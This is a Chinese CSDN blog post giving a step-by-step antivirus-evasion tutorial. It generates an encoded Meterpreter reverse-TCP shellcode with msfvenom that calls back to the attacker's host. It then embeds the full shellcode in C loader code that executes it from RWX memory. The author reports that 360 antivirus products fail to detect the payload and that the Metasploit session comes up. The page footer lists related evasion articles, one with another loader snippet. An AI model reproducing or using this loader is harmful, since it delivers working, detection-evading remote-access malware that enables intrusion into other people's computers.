免杀过360全家桶

最新推荐文章于 2024-05-19 13:30:00 发布
最新推荐文章于 2024-05-19 13:30:00 发布
阅读量3.9k 收藏 32
点赞数 2
分类专栏: 免杀 360杀毒 文章标签: 网络安全 360
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46676743/article/details/113350500
版权

免杀过360全家桶

1.kali生成一串shellcode

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 LHOST=kali的ip地址 LPORT=随便写个端口号(8888、9999都阔以) -f c

在这里插入图片描述

2.VS编写免杀程序

在这里插入图片描述
这里给出代码

#include <windows.h>
#include <stdio.h>
(这里是我生成的shellcode)
unsigned char buf[] =
"\xdd\xc3\xbd\xd9\x7e\xab\x4e\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
"\x78\x31\x68\x17\x03\x68\x17\x83\x31\x82\x49\xbb\x1a\xb0\x34"
"\xb3\xb0\xa3\xce\xe5\xbc\x0f\x25\x4d\x17\x99\x74\x1f\xe4\xd9"
"\x73\xd1\xba\xcd\x78\x41\xd9\x20\x6f\x5c\x59\x33\x8b\x95\xe1"
"\x05\xee\x51\xf1\x02\xc3\x91\x60\xe6\xb8\xd1\xf3\x06\x7b\x71"
"\x86\x22\x97\x4e\xb0\x6b\x15\x00\xb8\xa9\xbe\x55\x10\x25\xa2"
"\x2c\xa0\x8f\x61\x04\xa9\x1a\x11\x79\x6d\xdb\xc5\x6c\x35\xb7"
"\xa9\x21\x17\xad\x94\x82\xbb\x5e\x84\x94\x6c\xd6\x95\xb6\x74"
"\xc3\x11\xe7\x40\x36\x92\x8a\xe4\x0b\x9d\xf7\xf7\x57\xcf\xfb"
"\x19\xd8\x1a\x73\xfc\x99\xdd\x1e\xac\x02\x69\x7c\x8c\x56\x7d"
"\xff\xa9\xa8\xaa\xbc\x25\xf9\x86\x22\x73\xaf\xfe\x62\x19\x7a"
"\x01\xd4\x44\xc1\xf6\xbe\x69\x10\x12\x6b\x8e\xdb\x00\x1c\x8d"
"\xe9\x4c\x77\x9c\xb2\x08\x9d\x42\x2d\x1b\x89\x63\x06\x87\x3e"
"\x68\x06\x56\xc3\xbe\x4d\xa4\x82\x88\xed\xec\xa9\x62\xf4\xc9"
"\x88\x37\x3e\xe3\xc3\x2d\xda\x34\xb6\x0f\xcd\x9f\x1b\x24\x48"
"\x69\xf2\x77\xdd\x66\x94\xc2\x7b\x2a\x8e\x7d\xc7\x0e\xbb\x34"
"\xd2\x88\x58\xe2\x4a\xc2\xc2\x48\x8b\xa9\xa7\x01\x2b\xcf\x0a"
"\xdf\x68\x0b\x1a\x0e\x01\xe5\x06\x20\x12\xb6\x6a\xab\xbd\xac"
"\x0f\x8b\xdc\xe3\xf3\x94\x00\xa9\x2c\x65\x15\xd6\x26\x62\xc5"
"\xc9\x19\x8c\x6b\x14\xdc\x7e\xb3\x98\x40\x96\xcb\x82\x34\xa8"
"\x44\x9c\x89\xad\xe5\xde\xf9\x08\x9f\xc8\x9e\x1d\x89\x29\x70"
"\x23\x1f\x30\xb3\x30\xd7\x19\xca\x4b\x0f\xf8\x90\x02\x93\x54"
"\xe1\xad\x6f\x19\x0f\x6d\xa0\xa5\x10\x37\x84\xb6\x1b\x23\xc4"
"\xdf\x8e\xac\x28\x17\xd4\x40\xd4\xfc\x1d\xe2\x92\x7b\x8b\x93"
"\x95\x01\x98\x66\x3b\x82\xbd\x2e\x79\x13\x8a\xc1\x28\x94\x1c"
"\xe0\x0a\xc7\x11\x0b\x21\x46\xd6\xae\x0d\x2a\x72\xf6\xd4\xf2"
"\xac\xb6\x0c\x6d\xd3\x9d\x5d\x53\x47\x0c\x95\x4b\x3d\x33\xda"
"\x3a\xdb\xde\x65\xe2\xcc\xe2\x82\xad\xd5\x4a\x48\xa5\xd5\xfa"
"\xbc\x0c\xec\x6f\xfb\x10\xeb\x56\xe5\x56\xe3\xc3\x1f\xdf\xef"
"\x78\xd6\x35\xef\x4b\x1b\x0a\xe2\x0a\xce\x33\x14\xe3\x08\x95"
"\x35\x44\x9c\xba\x75\x53\x1f\x92\x94\x06\xca\xd6\x73\x23\x3a"
"\x1b\x5b\x31\xa7\xd8\xec\xd9\xdf\x41\x76\xf2\x97\xf9\xab\xa8"
"\x4c\x49\xc3\xd0\x6e\xa4\xa2\xe9\x92\xe1\x20\x1c\x91\x4b\x27"
"\x95\x94\x0c\x28\x02\x92\x5d\x30";

size_t size =sizeof(buf);



 int main() {

  char* inject;

   inject = (char*)VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE);

  memcpy(inject,buf,size);

  ((void(*)())inject)();


  return 0;

}

注意:属性–C/C+±-预编译头–选择不使用预编译头
在这里插入图片描述
插入一些图片或注释
在这里插入图片描述
在这里插入图片描述
生成解决方案
在这里插入图片描述
x86编译
在这里插入图片描述

3.查看生成的文件

在这里插入图片描述
在虚拟机用360进行查杀–360杀毒
在这里插入图片描述
在这里插入图片描述

360杀毒未报毒

用360安全卫士杀毒
在这里插入图片描述
在这里插入图片描述
360安全卫士未报毒,成功绕过360全家桶

4.msf上线

在这里插入图片描述
后续研究免杀过火绒。。

sash1mi
关注
  • 2
    点赞
  • 32
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
shellcode之360安全卫士免杀(shecodject)(一)
ZPFCD的博客
07-16 863
shellcode免杀
使用进程镂空技术免杀360Defender
ss810540895的博客
07-11 766
风暴免杀实现了进程注入和进程镂空技术以达到隐匿和免杀的效果,进程注入是利用windows API在目标进程中申请一块内存,然后将shellcode直接注入其中并创建线程运行,恶意的shellcode直接运行在目标程序内,结合运行后删除自身/从网络加载shellcode等方式,具备非常好的隐匿效果,目前测试只能稳定注入到explorer.exe进程中。通过hook技术可以实现对任意程序的监控,可以监视木马程序的行为,监控关键API调用等,于是出现了主动防御、沙箱等查杀技术。
利用360软件设置的360终极免杀.绝对过360
11-19
哼哼,研究了半年终于弄出了个利用360内部程序做的360免杀.百分之百过360.... 希望大家采纳!!!!!
网络安全】简单的免杀方法(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python栈
05-19 1540
小七免杀工具包里有很多的工具我就列出其中的一些常用的排名不分前后。
绕过360简单技巧(免杀
06-04
浴血凤凰的教程,用restorator修改版本和图标绕过360杀毒,适合免杀菜鸟看。不错哦
360安全卫士 免杀
qq_43647462的博客
11-15 717
绕过360安全卫士(无法绕过火绒) Buchiyexiao #include <windows.h> #include <stdio.h> #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//不显示窗口 unsigned char shellcode[] = "veil_shellcode"; void main() { LPVOID Memory = VirtualAlloc
最新过360免杀
12-17
最新过360免杀
360全家桶独立版360全家桶独立版
04-20
360全家桶独立版360全家桶独立版360全家桶独立版360全家桶独立版360全家桶独立版360全家桶独立版360全家桶独立版360全家桶独立版360全家桶独立版360全家桶独立版360全家桶独立版360全家桶独立版360全家桶独立版360...
免杀远控最新非常牛逼生成免杀360等常用杀软
08-24
免杀远控最新非常牛逼生成免杀360等常用杀软免杀远控最新非常牛逼生成免杀360等常用杀软免杀远控最新非常牛逼生成免杀360等常用杀软免杀远控最新非常牛逼生成免杀360等常用杀软免杀远控最新非常牛逼生成免杀360等...
20150827最新源码免杀360云鉴定与IP拦截教程
08-27
20150827最新源码免杀360云鉴定与IP拦截教程
360全家桶独立提取版本
10-02
"360全家桶独立提取版本"是一款包含360公司多款软件的集合,它提供了安全防护、系统优化、浏览器、云盘等多种服务。360作为中国知名的互联网安全公司,其产品线广泛,旨在为用户提供全方位的数字生活解决方案。 在...
最新免杀360全套,无提示上线,免杀世界杀毒网!!
12-18
最新免杀360全套
最新免杀360
12-17
最新免杀360云查杀
免杀并完美过360提示教程
12-07
饭客网络 叮噹出品 保证无毒 欢迎下载 避免河蟹 名字没有给全 大家自己下载吧!
易语言一键过免杀,过360. (加壳)
10-21
Esprotect3.9.exe 易语言一键过免杀,过360. (加壳)
免杀360过主动防御加入白名单代码放出
08-04
免杀过掉360主动防御加入白名单代码放出 仍痛割爱的放出来 象征性的收些分吧 希望大家珍惜
VS2010 免杀域名360个人版远控
01-15
这里的“免杀”指的是绕过安全软件的检测,通常是黑客或恶意软件开发者的目标,以便他们的程序可以在用户的计算机上运行而不被发现。而“360个人版远控”则暗示了这个话题与360安全卫士个人版的防护机制和远程控制...
mimikatz免杀360和火绒
qq_44905657的博客
12-28 2089
mimikatz mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取名闻密码和NTLM哈希值的工具,攻击者可以利用这种功能漫游内网。也可以通过明文密码或者hash值进行提权。这款工具机器出名所以被查杀的几率极高。 1、免杀方式 对mimikatz我们进行源码免杀。源码免杀只需要定位源码中的特征代码进行修改就可以达到预期的免杀效果。一般的定位特征码分为三种:定位倒代码上,定位到字符串上,定位到输入表上。 2、免杀处理 我们访问https://github.com/genti
2011年免费杀软横评:国产VS进口大激斗
参与评测的软件有金山毒霸2012、瑞星杀毒软件2011、江民杀毒软件KV2011、卡巴斯基反病毒软件2012、ESET NOD32防病毒软件4、诺顿防病毒软件2012以及360杀毒和小红伞(Avira AntiVir Premium)10。文章通过介绍各软件...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值